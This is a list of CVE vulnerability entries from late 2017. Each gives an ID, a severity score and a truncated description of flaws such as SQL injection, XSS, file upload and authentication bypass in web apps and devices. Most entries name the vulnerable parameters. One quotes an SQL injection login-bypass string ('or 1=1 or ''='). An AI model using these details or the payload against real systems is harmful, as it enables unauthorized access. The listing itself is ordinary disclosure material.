SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did
01-01-2018 - 01:29 01-01-2018 - 01:29
CVE-2018-3810 7.5
Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages ser
01-01-2018 - 01:29 01-01-2018 - 01:29
CVE-2015-3302 5.0
The TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote attackers to obtain sensitive order detail information by leveraging a "broken authentication mechanism."
29-12-2017 - 17:29 29-12-2017 - 17:29
CVE-2017-17876 5.0
Biometric Shift Employee Management System 3.0 allows remote attackers to bypass intended file-read restrictions via a user=download request with a pathname in the path parameter.
27-12-2017 - 12:08 27-12-2017 - 12:08
CVE-2017-17875 7.5
The JEXTN FAQ Pro extension 4.0.0 for Joomla! has SQL Injection via the id parameter in a view=category action.
27-12-2017 - 12:08 27-12-2017 - 12:08
CVE-2017-17411 10.0
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issu
21-12-2017 - 09:29 21-12-2017 - 09:29
CVE-2017-17752 4.3
Ability Mail Server 3.3.2 has Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). This is fixed in version 4.2.4.
20-12-2017 - 11:29 20-12-2017 - 11:29
CVE-2017-17759 10.0
Conarc iChannel allows remote attackers to obtain sensitive information, modify the configuration, or cause a denial of service (by deleting the configuration) via a wc.dll?wwMaint~EditConfig request (which reaches an older version of a West Wind Web
19-12-2017 - 02:29 19-12-2017 - 02:29
CVE-2017-16949 7.5
An issue was discovered in the AccessKeys AccessPress Anonymous Post Pro plugin through 3.1.9 for WordPress. Improper input sanitization allows the attacker to override the settings for allowed file extensions and upload file size, related to inc/cor
18-12-2017 - 21:29 18-12-2017 - 21:29
CVE-2017-17721 7.5
CWEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.
18-12-2017 - 11:29 18-12-2017 - 11:29
CVE-2017-17649 4.3
Readymade Video Sharing Script 3.2 has HTML Injection via the single-video-detail.php comment parameter.
18-12-2017 - 04:29 18-12-2017 - 04:29
CVE-2017-17645 7.5
Bus Booking Script 1.0 has SQL Injection via the txtname parameter to admin/index.php.
18-12-2017 - 04:29 18-12-2017 - 04:29
CVE-2017-17643 7.5
FS Lynda Clone 1.0 has SQL Injection via the keywords parameter to tutorial/.
18-12-2017 - 04:29 18-12-2017 - 04:29
CVE-2017-17739 7.5
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has directory traversal via the /storage.html rp parameter, allowing an attacker to read or write to files.
18-12-2017 - 01:29 18-12-2017 - 01:29
CVE-2017-17738 6.4
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) allows renaming and modifying files via /tools.html.
18-12-2017 - 01:29 18-12-2017 - 01:29
CVE-2017-17737 4.3
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has XSS via the REF parameter to /network_diagnostics.html or /storage_info.html.
18-12-2017 - 01:29 18-12-2017 - 01:29
CVE-2017-16787 4.0
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote attackers to read arbitrary files by leveraging failure to restrict URL access.
15-12-2017 - 13:29 15-12-2017 - 13:29
CVE-2017-5264 6.8
Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack.
14-12-2017 - 16:29 14-12-2017 - 16:29
CVE-2017-17672 7.5
In vBulletin through 5.3.x, there is an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution, because of unsafe usage of PHP's unserialize() in vB_Library_Template's cach
13-12-2017 - 19:29 13-12-2017 - 19:29
CVE-2017-17111 7.5
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
11-12-2017 - 12:29 11-12-2017 - 12:29
CVE-2017-17110 7.5
Techno Portfolio Management Panel 1.0 allows an attacker to inject SQL commands via a single.php?id= request.
11-12-2017 - 12:29 11-12-2017 - 12:29
CVE-2017-11319 6.5
Perspective ICM Investigation & Case 5.1.1.16 allows remote authenticated users to modify access level permissions and consequently gain privileges by leveraging insufficient validation methods and missing cross server side checking mechanisms.
11-12-2017 - 12:29 11-12-2017 - 12:29
CVE-2017-16921 9.0
In OTRS 6.0.x up to and including 6.0.1, OTRS 5.0.x up to and including 5.0.24, and OTRS 4.0.x up to and including 4.0.26, an attacker who is logged into OTRS as an agent can manipulate form parameters (related to PGP) and execute arbitrary shell com
08-12-2017 - 10:29 08-12-2017 - 10:29
CVE-2017-17055 8.5
Artica Web Proxy before 3.06.112911 allows remote attackers to execute arbitrary code as root by conducting a cross-site scripting (XSS) attack involving the username-form-id parameter to freeradius.users.php.
06-12-2017 - 21:29 06-12-2017 - 21:29
CVE-2017-16884 4.3
Cross-site scripting (XSS) vulnerability in MistServer before 2.13 allows remote attackers to inject arbitrary web script or HTML via vectors related to failed authentication requests alerts.
06-12-2017 - 21:29 06-12-2017 - 21:29
CVE-2017-16953 5.0
connoppp.cgi on ZTE ZXDSL 831CII devices does not require HTTP Basic Authentication, which allows remote attackers to modify the PPPoE configuration or set up a malicious configuration via a GET request.
01-12-2017 - 12:29 01-12-2017 - 12:29
CVE-2017-17058 5.0
** DISPUTED ** The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that D
29-11-2017 - 02:29 29-11-2017 - 02:29
CVE-2016-6024 4.0
IBM Jazz technology based products might divulge information that might be useful in helping attackers through error messages. IBM X-Force ID: 116868.
27-11-2017 - 16:29 27-11-2017 - 16:29
CVE-2017-16843 3.5
Vonage VDV-23 115 3.2.11-0.9.40 devices have stored XSS via the NewKeyword or NewDomain field to /goform/RgParentalBasic.
16-11-2017 - 16:29 16-11-2017 - 16:29
CVE-2017-16841 4.3
LanSweeper 6.0.100.75 has XSS via the description parameter to /Calendar/CalendarActions.aspx.
15-11-2017 - 22:29 15-11-2017 - 22:29
CVE-2017-15806 6.8
The send function in the ezcMailMtaTransport class in Zeta Components Mail before 1.8.2 does not properly restrict the set of characters used in the ezcMail returnPath property, which might allow remote attackers to execute arbitrary code via a craft
15-11-2017 - 11:29 15-11-2017 - 11:29
CVE-2017-12636 9.0
CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB bef
14-11-2017 - 15:29 14-11-2017 - 15:29
CVE-2017-12635 10.0
Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the data
14-11-2017 - 15:29 14-11-2017 - 15:29
CVE-2017-16807 3.5
A cross-site Scripting (XSS) vulnerability in Kirby Panel before 2.3.3, 2.4.x before 2.4.2, and 2.5.x before 2.5.7 exists when displaying a specially prepared SVG document that has been uploaded as a content file.
13-11-2017 - 16:29 13-11-2017 - 16:29
CVE-2017-16568 3.5
Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a radio URL.
09-11-2017 - 21:29 09-11-2017 - 21:29
CVE-2017-16567 3.5
Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a "favorite."
09-11-2017 - 21:29 09-11-2017 - 21:29
CVE-2015-3933 7.5
Multiple SQL injection vulnerabilities in inc/lib/User.class.php in MetalGenix GeniXCMS before 0.0.3-patch allow remote attackers to execute arbitrary SQL commands via the (1) email parameter or (2) userid parameter to register.php.
08-11-2017 - 11:29 08-11-2017 - 11:29
CVE-2017-14016 6.8
A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. The application lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an a
06-11-2017 - 17:29 06-11-2017 - 17:29
CVE-2017-16570 6.8
KeystoneJS before 4.0.0-beta.7 allows application-wide CSRF bypass by removing the CSRF parameter and value, aka SecureLayer7 issue number SL7_KEYJS_03. In other words, it fails to reject requests that lack an x-csrf-token header.
06-11-2017 - 03:29 06-11-2017 - 03:29
CVE-2017-16524 6.5
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices suffers from an Unrestricted file upload vulnerability: 'network_ssl_upload.php' allows remote authenticated attackers to upload and execute arbitrary PHP code via a filename with a .php extension, wh
06-11-2017 - 03:29 06-11-2017 - 03:29
CVE-2017-16543 7.5
Zoho ManageEngine Applications Manager 13 before build 13500 allows SQL injection via GraphicalView.do, as demonstrated by a crafted viewProps yCanvas field or viewid parameter.
05-11-2017 - 12:29 05-11-2017 - 12:29
CVE-2017-16542 6.5
Zoho ManageEngine Applications Manager 13 before build 13500 allows Post-authentication SQL injection via the name parameter in a manageApplications.do?method=insert request.
05-11-2017 - 12:29 05-11-2017 - 12:29
CVE-2017-16244 6.8
Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF tokens for postback handling, allowing an attacker to successfully take over the victim's account. The attack bypasses a protection mechanism i
31-10-2017 - 21:29 31-10-2017 - 21:29
CVE-2017-15993 7.5
Zomato Clone Script allows SQL Injection via the restaurant-menu.php resid parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15992 7.5
Website Broker Script allows SQL Injection via the 'status_id' Parameter to status_list.php.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15991 7.5
Vastal I-Tech Agent Zone (aka The Real Estate Script) allows SQL Injection in searchCommercial.php via the property_type, city, or posted_by parameter, or searchResidential.php via the property_type, city, or bedroom parameter, a different vulnerabil
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15990 7.5
Php Inventory & Invoice Management System allows Arbitrary File Upload via dashboard/edit_myaccountdetail/.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15989 7.5
Online Exam Test Application allows SQL Injection via the resources.php sort parameter in a category action.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15988 7.5
Nice PHP FAQ Script allows SQL Injection via the index.php nice_theme parameter, a different vulnerability than CVE-2008-6525.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15987 7.5
Fake Magazine Cover Script allows SQL Injection via the rate.php value parameter or the content.php id parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15986 7.5
CPA Lead Reward Script allows SQL Injection via the username parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15985 7.5
Basic B2B Script allows SQL Injection via the product_view1.php pid or id parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15984 7.5
Creative Management System (CMS) Lite 1.4 allows SQL Injection via the S parameter to index.php.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15983 7.5
MyMagazine Magazine & Blog CMS 1.0 allows SQL Injection via the id parameter to admin/admin_process.php for form editing.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15982 7.5
Dynamic News Magazine & Blog CMS 1.0 allows SQL Injection via the id parameter to admin/admin_process.php for form editing.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15981 7.5
Responsive Newspaper Magazine & Blog CMS 1.0 allows SQL Injection via the id parameter to admin/admin_process.php for form editing.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15980 7.5
US Zip Codes Database Script 1.0 allows SQL Injection via the state parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15979 7.5
Shareet - Photo Sharing Social Network 1.0 allows SQL Injection via the photo parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15978 7.5
AROX School ERP PHP Script 1.0 allows SQL Injection via the office_admin/ id parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15977 7.5
Protected Links - Expiring Download Links 1.0 allows SQL Injection via the username parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15976 7.5
ZeeBuddy 2x allows SQL Injection via the admin/editadgroup.php groupid parameter, a different vulnerability than CVE-2008-3604.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15975 7.5
Vastal I-Tech Dating Zone 0.9.9 allows SQL Injection via the 'product_id' to add_to_cart.php, a different vulnerability than CVE-2008-4461.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15974 7.5
tPanel 2009 allows SQL injection for Authentication Bypass via 'or 1=1 or ''=' to login.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15973 7.5
Sokial Social Network Script 1.0 allows SQL Injection via the id parameter to admin/members_view.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15972 7.5
SoftDatepro Dating Social Network 1.3 allows SQL Injection via the viewprofile.php profid parameter, the viewmessage.php sender_id parameter, or the /admin Email field, a related issue to CVE-2017-15971.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15971 7.5
Same Sex Dating Software Pro 1.0 allows SQL Injection via the viewprofile.php profid parameter, the viewmessage.php sender_id parameter, or the /admin Email field, a related issue to CVE-2017-15972.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15970 7.5
PHP CityPortal 2.0 allows SQL Injection via the nid parameter to index.php in a page=news action, or the cat parameter.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15969 7.5
PG All Share Video 1.0 allows SQL Injection via the PATH_INFO to search/tag, friends/index, users/profile, or video_catalog/category.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15968 7.5
MyBuilder Clone 1.0 allows SQL Injection via the phpsqlsearch_genxml.php subcategory parameter.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15967 7.5
Mailing List Manager Pro 3.0 allows SQL Injection via the edit parameter to admin/users in a sort=login action, or the edit parameter to admin/template.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15966 7.5
The Zh YandexMap (aka com_zhyandexmap) component 6.1.1.0 for Joomla! allows SQL Injection via the placemarklistid parameter to index.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15965 7.5
The NS Download Shop (aka com_ns_downloadshop) component 2.2.6 for Joomla! allows SQL Injection via the id parameter in an invoice.create action.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15964 7.5
Job Board Script Software allows SQL Injection via the PATH_INFO to a /job-details URI.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15963 7.5
iTech Gigs Script 1.21 allows SQL Injection via the browse-scategory.php sc parameter or the service-provider.php ser parameter.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15962 7.5
iStock Management System 1.0 allows Arbitrary File Upload via user/profile.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15961 7.5
iProject Management System 1.0 allows SQL Injection via the ID parameter to index.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15960 7.5
Article Directory Script 3.0 allows SQL Injection via the id parameter to author.php or category.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15959 7.5
Adult Script Pro 2.2.4 allows SQL Injection via the PATH_INFO to a /download URI, a different vulnerability than CVE-2007-6576.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15958 7.5
D-Park Pro Domain Parking Script 1.0 allows SQL Injection via the username to admin/loginform.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15957 6.5
my_profile.php in Ingenious School Management System 2.3.0 allows a student or teacher to upload an arbitrary file.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2014-2023 7.5
Multiple SQL injection vulnerabilities in the Tapatalk plugin 4.9.0 and earlier and 5.x through 5.2.1 for vBulletin allow remote attackers to execute arbitrary SQL commands via a crafted xmlrpc API request to (1) unsubscribe_forum.php or (2) unsubscr
26-10-2017 - 16:29 26-10-2017 - 16:29
CVE-2017-15879 6.8
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
24-10-2017 - 17:29 24-10-2017 - 17:29
CVE-2017-15878 4.3
A cross-site scripting (XSS) vulnerability exists in fields/types/markdown/MarkdownType.js in KeystoneJS before 4.0.0-beta.7 via the Contact Us feature.
24-10-2017 - 17:29 24-10-2017 - 17:29
CVE-2017-15081 7.5
In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
24-10-2017 - 02:29 24-10-2017 - 02:29
CVE-2017-13772 9.0
Multiple stack-based buffer overflows in TP-Link WR940N WiFi routers with hardware version 4 allow remote authenticated users to execute arbitrary code via the (1) ping_addr parameter to PingIframeRpm.htm or (2) dnsserver2 parameter to WanStaticIpV6C
23-10-2017 - 14:29 23-10-2017 - 14:29
CVE-2015-5533 6.5
SQL injection vulnerability in counter-options.php in the Count Per Day plugin before 3.4.1 for WordPress allows remote authenticated administrators to execute arbitrary SQL commands via the cpd_keep_month parameter to wp-admin/options-general.php.
23-10-2017 - 14:29 23-10-2017 - 14:29
CVE-2015-2878 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Hexis HawkEye G 3.0.1.4912 allow remote attackers to hijack the authentication of administrators for requests that (1) add arbitrary accounts via the name parameter to interface/rest/accou
23-10-2017 - 14:29 23-10-2017 - 14:29
CVE-2017-15687 4.3
DOM Based Cross Site Scripting (XSS) exists in Logitech Media Server 7.7.1, 7.7.2, 7.7.3, 7.7.5, 7.7.6, 7.9.0, and 7.9.1 via a crafted URI.
23-10-2017 - 04:29 23-10-2017 - 04:29
CVE-2017-15580 7.5
osTicket 1.10.1 provides a functionality to upload 'html' files with associated formats. However, it does not properly validate the uploaded file's contents and thus accepts any type of file, such as with a tickets.php request that is modified with a
23-10-2017 - 04:29 23-10-2017 - 04:29
CVE-2017-15730 6.8
In phpMyFAQ before 2.9.9, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.
22-10-2017 - 14:29 22-10-2017 - 14:29
CVE-2017-15291 4.3
Cross-site scripting (XSS) vulnerability in the Wireless MAC Filtering page in TP-LINK TL-MR3220 wireless routers allows remote attackers to inject arbitrary web script or HTML via the Description field.
20-10-2017 - 13:29 20-10-2017 - 13:29
CVE-2017-15639 4.0
tasks/feed/readRSS.cfm in Mura CMS before 6.2 allows attackers to bypass intended access restrictions by leveraging the "draggable feeds" feature.
19-10-2017 - 15:29 19-10-2017 - 15:29
CVE-2017-10366 7.5
Vulnerability in the PeopleSoft Enterprise PT PeopleTools component of Oracle PeopleSoft Products (subcomponent: Performance Monitor). Supported versions that are affected are 8.54, 8.55 and 8.56. Easily exploitable vulnerability allows unauthenticat
19-10-2017 - 13:29 19-10-2017 - 13:29
CVE-2017-10309 6.8
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Deployment). Supported versions that are affected are Java SE: 8u144 and 9. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple prot
19-10-2017 - 13:29 19-10-2017 - 13:29
CVE-2017-10033 3.3
Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Support Tools). Supported versions that are affected are 11.1.1.8.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows unauthenticated attacker wi
19-10-2017 - 13:29 19-10-2017 - 13:29
CVE-2017-15359 4.0
In the 3CX Phone System 15.5.3554.1, the Management Console typically listens to port 5001 and is prone to a directory traversal attack: "/api/RecordingList/DownloadRecord?file=" and "/api/SupportInfo?file=" are the vulnerable parameters. An attacker
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2017-14956 3.5
AlienVault USM v5.4.2 and earlier offers authenticated users the functionality of exporting generated reports via the "/ossim/report/wizard_email.php" script. Besides offering an export via a local download, the script also offers the possibility to
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2017-14322 10.0
The function in charge to check whether the user is already logged in init.php in Interspire Email Marketer (IEM) prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie wit
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2015-7715 6.8
Cross-site request forgery (CSRF) vulnerability in the Realtyna RPL (com_rpl) component before 8.9.5 for Joomla! allows remote attackers to hijack the authentication of administrators for requests that add a user via an add_user action to administrat
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2015-7714 6.5
Multiple SQL injection vulnerabilities in the Realtyna RPL (com_rpl) component before 8.9.5 for Joomla! allow remote administrators to execute arbitrary SQL commands via the (1) id, (2) copy_field in a data_copy action, (3) pshow in an update_field a
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2015-2780 7.5
Unrestricted file upload vulnerability in Berta CMS allows remote attackers to execute arbitrary code by uploading a crafted image file with an executable extension, then accessing it via a direct request to the file in an unspecified directory.
16-10-2017 - 14:29 16-10-2017 - 14:29
CVE-2014-9148 7.5
Fiyo CMS 2.0.1.8 allows remote attackers to bypass intended access restrictions and execute the (1) "Install and Update" or (2) Backup super administrator function via the view parameter in a direct request to fiyo/dapur.
16-10-2017 - 11:29 16-10-2017 - 11:29
CVE-2014-9147 5.0
Fiyo CMS 2.0.1.8 allows remote attackers to obtain sensitive information via a direct request to the database backup file in .backup/.
16-10-2017 - 11:29 16-10-2017 - 11:29
CVE-2017-15374 4.3
Shopware v5.2.5 - v5.3 is vulnerable to cross site scripting in the customer and order section of the content management system backend modules. Remote attackers are able to inject malicious script code into the firstname, lastname, or order input fi
16-10-2017 - 00:29 16-10-2017 - 00:29
CVE-2017-12629 7.5
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is N
14-10-2017 - 19:29 14-10-2017 - 19:29
CVE-2017-15276 6.5
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 contains the following design gap, which allows an authenticated user to gain superuser privileges: Content Server allows uploading content using batches (TAR arc
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15014 4.0
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 contains the following design gap, which allows authenticated users to download arbitrary content files regardless of the attacker's repository permissions: When
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15013 6.5
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 contains the following design gap, which allows an authenticated user to gain superuser privileges: Content Server stores information about uploaded files in dmr_
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15012 6.5
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 does not properly validate the input of the PUT_FILE RPC-command, which allows any authenticated user to hijack an arbitrary file from the Content Server filesyst
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15287 4.3
There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
12-10-2017 - 11:29 12-10-2017 - 11:29
CVE-2017-15284 3.5
Cross-Site Scripting exists in OctoberCMS 1.0.425 (aka Build 425), allowing a least privileged user to upload an SVG file containing malicious code as the Avatar for the profile. When this is opened by the Admin, it causes JavaScript execution in the
12-10-2017 - 04:29 12-10-2017 - 04:29
CVE-2017-14087 5.0
A Host Header Injection vulnerability in Trend Micro OfficeScan XG (12.0) may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-14086 7.8
Pre-authorization Start Remote Process vulnerabilities in Trend Micro OfficeScan 11.0 and XG may allow unauthenticated users who can access the OfficeScan server to start the fcgiOfcDDA.exe executable or cause a potential INI corruption, which may ca
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-14085 5.0
Information disclosure vulnerabilities in Trend Micro OfficeScan 11.0 and XG may allow unauthenticated users who can access the OfficeScan server to query the network's NT domain or the PHP version and modules.
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-14083 5.0
A vulnerability in Trend Micro OfficeScan 11.0 and XG allows remote unauthenticated users who can access the system to download the OfficeScan encryption file.
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-12617 6.8
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload
03-10-2017 - 21:29 03-10-2017 - 21:29
CVE-2017-6090 6.5
Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to th
02-10-2017 - 21:29 02-10-2017 - 21:29
CVE-2017-6089 7.5
SQL injection vulnerability in PhpCollab 2.5.1 and earlier allows remote attackers to execute arbitrary SQL commands via the (1) project or id parameters to topics/deletetopics.php; the (2) id parameter to bookmarks/deletebookmarks.php; or the (3) id
02-10-2017 - 21:29 02-10-2017 - 21:29
CVE-2017-14848 6.5
WPHRM Human Resource Management System for WordPress 1.0 allows SQL Injection via the employee_id parameter.
02-10-2017 - 21:29 02-10-2017 - 21:29
CVE-2017-14955 4.3
Check_MK before 1.2.8p26 mishandles certain errors within the failed-login save feature because of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI crash report.
01-10-2017 - 21:29 01-10-2017 - 21:29
CVE-2017-14738 7.5
FileRun (version 2017.09.18 and below) suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the metafield parameter inside the metasearch module (under the search function).
29-09-2017 - 21:29 29-09-2017 - 21:29
CVE-2017-14620 4.3
SmarterStats Version 11.3.6347 will Render the Referer Field of HTTP Logfiles from URL /Data/Reports/ReferringURLsWithQueries resulting in Stored Cross Site Scripting.
29-09-2017 - 21:29 29-09-2017 - 21:29
CVE-2017-14507 7.5
Multiple SQL injection vulnerabilities in the Content Timeline plugin 4.4.2 for WordPress allow remote attackers to execute arbitrary SQL commands via the (1) timeline parameter in content_timeline_class.php; or the id parameter to (2) pages/content_
28-09-2017 - 21:34 28-09-2017 - 21:34
CVE-2017-14847 6.5
Mojoomla WPAMS Apartment Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14846 6.5
Mojoomla Hospital Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14845 6.5
Mojoomla WPCHURCH Church Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14844 6.5
Mojoomla WPGYM WordPress Gym Management System allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14843 6.5
Mojoomla School Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14842 6.5
Mojoomla SMSmaster Multipurpose SMS Gateway for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14841 4.0
Mojoomla Annual Maintenance Contract (AMC) Management System allows Arbitrary File Upload in profilesetting image handling.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14840 6.5
TeamWork TicketPlus allows Arbitrary File Upload in updateProfile.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14839 6.5
TeamWork Photo Fusion allows Arbitrary File Upload in changeAvatar and changeCover.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14838 6.5
TeamWork Job Links allows Arbitrary File Upload in profileChange and coverChange.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14704 6.5
Multiple unrestricted file upload vulnerabilities in the (1) imageSubmit and (2) proof_submit functions in Claydip Laravel Airbnb Clone 1.0 allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension, t
26-09-2017 - 10:29 26-09-2017 - 10:29
CVE-2017-14703 7.5
SQL injection vulnerability in Cash Back Comparison Script 1.0 allows remote attackers to execute arbitrary SQL commands via the PATH_INFO to search/.
26-09-2017 - 09:29 26-09-2017 - 09:29
CVE-2015-7293 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Zope Management Interface 4.3.7 and earlier, and Plone before 5.x.
25-09-2017 - 17:29 25-09-2017 - 17:29
CVE-2015-4669 7.2
The MySQL "root" user in Xsuite 2.x does not have a password set, which allows local users to access databases on the system.
25-09-2017 - 13:29 25-09-2017 - 13:29
CVE-2015-4668 5.8
Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter.
25-09-2017 - 13:29 25-09-2017 - 13:29
CVE-2015-4667 7.5
Multiple hardcoded credentials in Xsuite 2.x.
25-09-2017 - 13:29 25-09-2017 - 13:29
CVE-2017-14717 3.5
In EPESI 1.8.2 rev20170830, there is Stored XSS in the Tasks Description parameter.
22-09-2017 - 15:29 22-09-2017 - 15:29
CVE-2017-14712 3.5
